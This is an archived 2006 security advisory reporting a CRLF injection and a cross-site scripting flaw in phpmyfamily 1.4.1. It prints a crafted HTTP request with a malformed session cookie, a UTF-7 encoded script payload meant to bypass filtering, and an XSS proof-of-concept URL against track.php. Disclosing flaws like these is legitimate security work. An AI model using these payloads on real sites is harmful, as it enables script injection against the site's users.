TUCoPS :: Web :: PHP :: b06-1242.htm

phpmyfamily 1.4.1 CRLF injection & XSS
HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection & XSS
HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection & XSS



------------------------------------------------------
      HYSA-2006-007 h4cky0u.org Advisory 016
------------------------------------------------------
Date - Mon March 27 2006


TITLE:
=====
phpmyfamily v1.4.1 CRLF injection & XSS


SEVERITY:
========
Medium


SOFTWARE:
========
phpmyfamily v1.4.1

http://www.phpmyfamily.net/ 


INFO:
====
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members to maintain a central 

database of research which is readily accessable and editable.


DESCRIPTION:
===========
--== CRLF Injection ==--

GET /phpmyfamily/ HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 

0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88

You can try to encode  in Utf-7 like this:

+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer'); +ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- 

This way you can bypass the protection, but I'm not sure that it will work. For me it didn't but I'm still a beginner with 

the crlf attacks.

--== XSS ==--

http://127.0.0.1/phpmyfamily/track.php?person=00001&name='>&email=1&action=sub&submit=Wy%B6lij 


VENDOR STATUS:
=============
Vendor was contacted but no response received till date.


CREDITS:
=======
This vulnerability was discovered and researched by matrix_killer of h4cky0u Security Forums.

mail : matrix_k at abv.bg

web : http://www.h4cky0u.org 


Co-Researcher:

h4cky0u of h4cky0u Security Forums.

mail : h4cky0u at gmail.com

web : http://www.h4cky0u.org 

Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!


ORIGINAL ADVISORY:
=================
http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt 

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH